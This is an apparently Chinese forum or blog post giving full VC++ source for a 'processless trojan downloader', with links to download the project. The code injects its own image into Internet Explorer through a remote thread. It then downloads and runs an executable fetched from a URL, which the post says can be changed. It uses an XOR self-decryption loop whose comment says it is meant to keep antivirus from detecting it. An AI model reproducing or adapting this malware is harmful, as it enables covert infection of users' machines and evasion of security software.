VC无进程木马下载器源码(利用IE隐藏进程)

 

 

一、 打开半年前的一个工程，是利用IE来隐藏进程下载的实例，我想灰鸽子也是类似原理吧！

 

      下面是程序的主要思路：

 

      1.获取程序自身路径，启动IE进程

 

      2.获取到IE进程句柄

 

      3.分配内存

 

      4.获取进程映像的地址

 

      5.得到内存镜像大小

 

      6.确定起始基址和内存映像基址的位置

 

      7.写内存，创建线程，写数据

 

      8.建立远程线程并运行,关闭对象

 

 

二、下面是源码 ，举例下载迅雷而矣：

/* VC无进程木马下载器 By: Kardinal and 寂寞的狼 2009.3.10 */ #include <windows.h> #pragma comment(lib,"user32.lib") #pragma comment(lib,"kernel32.lib") //取消这4行的注释，可编译出2K大的文件 //#pragma comment(linker,"/OPT:NOWIN98") //#pragma comment(linker,"/merge:.data=.text") //#pragma comment(linker,"/merge:.rdata=.text") //#pragma comment(linker,"/align:0x200") #pragma comment(linker,"/ENTRY:decrpt") #pragma comment(linker,"/subsystem:windows") #pragma comment(linker,"/BASE:0x13150000") //动态加载shell32.dll中的ShellExecuteA函数 HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int); //动态加载Urlmon.dll中的UrlDownloadToFileA函数 DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR); //建立远程线程，并运行 HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); void decrpt(); HANDLE processhandle; DWORD pid; HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE与HMOUDLE是通用 // 注入使用的下载函数 void download() { hshell = LoadLibrary("Shell32.dll"); hurlmon = LoadLibrary("urlmon.dll"); (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA"); (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA"); //下载的文件自行调整 DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL); SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5); ExitProcess(0); } void main() { char iename[MAX_PATH],iepath[MAX_PATH]; ZeroMemory(iename,sizeof(iename)); ZeroMemory(iepath,sizeof(iepath)); // 1.获取程序自身路径，启动IE进程 GetWindowsDirectory(iepath,MAX_PATH); strncpy(iename,iepath,3); strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE"); WinExec(iename,SW_SHOWNORMAL); Sleep(500); // 2.得到IE进程句柄 HWND htemp; htemp = FindWindow("IEFrame",NULL); GetWindowThreadProcessId(htemp,&pid); // 3.分配内存 HMODULE Module; LPVOID NewModule; DWORD Size; LPDWORD lpimagesize; // 4.进程映像的地址 Module = GetModuleHandle(NULL); // 5.得到内存镜像大小 _asm { push eax; push ebx; mov ebx,Module; mov eax,[ebx+0x3c]; lea eax,[ebx+eax+0x50]; mov eax,[eax] mov lpimagesize,eax; pop ebx; pop eax; }; Size=(DWORD)lpimagesize; // 确定起始基址和内存映像基址的位置 NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // 6.写内存，创建线程，写数据 WriteProcessMemory(processhandle, NewModule, Module, Size, NULL); LPTHREAD_START_ROUTINE entrypoint; __asm { push eax; lea eax,download; mov entrypoint,eax; pop eax } hkernel=LoadLibrary("KERNEL32.dll"); (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread"); MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行 // 7.关闭对象 CloseHandle(processhandle); return; } ; // 解密函数 void decrpt() { HANDLE myps; DWORD oldAttr; BYTE shellcode[500]; ZeroMemory(shellcode,sizeof(shellcode)); myps=GetCurrentProcess(); ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr); //先把原代码,搬移到变量中保存起来 _asm { pushad; lea esi,download; lea edi,shellcode; lea ecx,decrpt; sub ecx,esi; en1: lodsb; stosb; dec ecx; jne en1; popad; }; //解密搬回 int i; for (i=1;i<=0xFF;i++) { _asm { pushad; lea esi,shellcode; lea edi,download; lea ecx,decrpt; sub ecx,edi; en2: lodsb; mov ebx,i; xor al,bl; stosb; dec ecx; jne en2; popad; }; //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒. __try { main(); return; } __except(EXCEPTION_EXECUTE_HANDLER) { }; } return; }

 

三、工程及源码下载地址：

 

      http://download.csdn.net/source/1546155

 

      http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/